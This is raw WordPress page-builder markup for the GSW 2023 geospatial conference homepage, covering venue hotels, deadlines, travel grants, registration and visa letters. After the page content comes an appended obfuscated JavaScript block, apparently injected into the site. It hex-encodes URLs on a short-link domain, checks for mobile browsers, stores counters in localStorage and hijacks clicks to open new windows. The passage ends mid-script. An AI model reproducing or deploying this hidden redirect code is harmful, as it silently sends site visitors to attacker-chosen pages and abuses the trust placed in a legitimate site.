wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686348481134{margin-top: 200px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 